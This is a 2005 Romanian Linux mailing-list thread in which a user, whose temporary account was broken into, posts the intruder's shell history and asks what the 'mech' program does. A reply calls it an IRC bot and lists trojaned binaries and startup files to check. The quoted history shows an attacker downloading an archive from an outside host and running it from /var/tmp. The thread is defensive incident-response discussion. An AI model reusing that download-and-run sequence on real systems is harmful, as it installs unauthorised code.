[rlug] Re: m-au spart ...

Thu, 19 May 2005 08:23:26 -0700 

Adrian Coman wrote:
> Din cauza ca sunt prost si am facut un user temp + am uitat sa pornesc
> firewall-ul (il oprisem cu motiv) s-a gasit cineva care mi-a spart
> acest cont.
> 
> Mi-am dat seama la timp si acum am acces la history-ul lui:
> 
>     9  cat /etc/hosts
>    10  cd /var/tmp
>    11  /sbin/ifconfig
>    12  cd /var/tmp
>    13  cd /var/tmp
>    14  wget basarabi.go.ro/mech.tar.gz
>    15  tar zxf mech.tar.gz
>    16  rm -rf mech.tar.gz
>    17  cd mech
>    18  ./mech
>    19  ./mech
>    20  ./mech
> 
> 
> Am si programul asta, nu a mai avut timp sa stearga nimic.
> Aveti idee ce face? Am cautat google si nu m-am dumirit.
> Directorul mech contine:
> 
> LinkEvents
> mech
> mech2.usr
> mech3.usr
> mech.levels
> mech.pid
> mech.session
> mech.set
> randfiles
> Vampir.seen
> 
> Cred ca are legatura cu IRC-ul ca vad niste mesaje ptr ca in
> directorul randfiles sunt niste fisiere txt cu diverse mesaje.
> 
> V-ati intalnit (folosit) acest programel? Stiti ce face? Ce trebuie sa
> ve verific sa fiu sigur ca nu mi-a modificat ceva prin sistem?
> 
> Thanks,
> Adi
> 
> --- 
> Detalii despre listele noastre de mail: http://www.lug.ro/
> 
> 
> 
> 
        booooooots dude.
        Respectivii sunt doar niste kiddos care nu vor altceva decat irc shit 
or stuff like that (bnc's,bots,flooooooooood). Nu cred ca va trebui sa 
faci o reinstalare ca nu-s ei chiar asa de destepti, dar va trebui sa 
verifici fisierele. In special modifica ifconfig, ps, lsof, pstree, 
grep, egrep... si poate altele care nu-mi vin acuma. Check 
/etc/rc.d/rc.local si/sau /etc/rc.d/rc.sysinit (daca ai rh* or fc*), pe 
acolo isi puneau rootkiturile "generice" prostiile, dar si in altele 
fisiere de prin /etc/rc.d/init.d/*.

        k1ll th3 l33t l4m3rz.


..........................................................................
Privileged/Confidential Information may be contained in this message.
If you are not the addressee indicated in this message (or responsible
fordelivery of the message to such person), you may not copy or deliver 
this message to anyone. In such a case, you should destroy this message 
and kindly notify the sender by reply e-mail.


--- 
Detalii despre listele noastre de mail: http://www.lug.ro/

Raspunde prin e-mail lui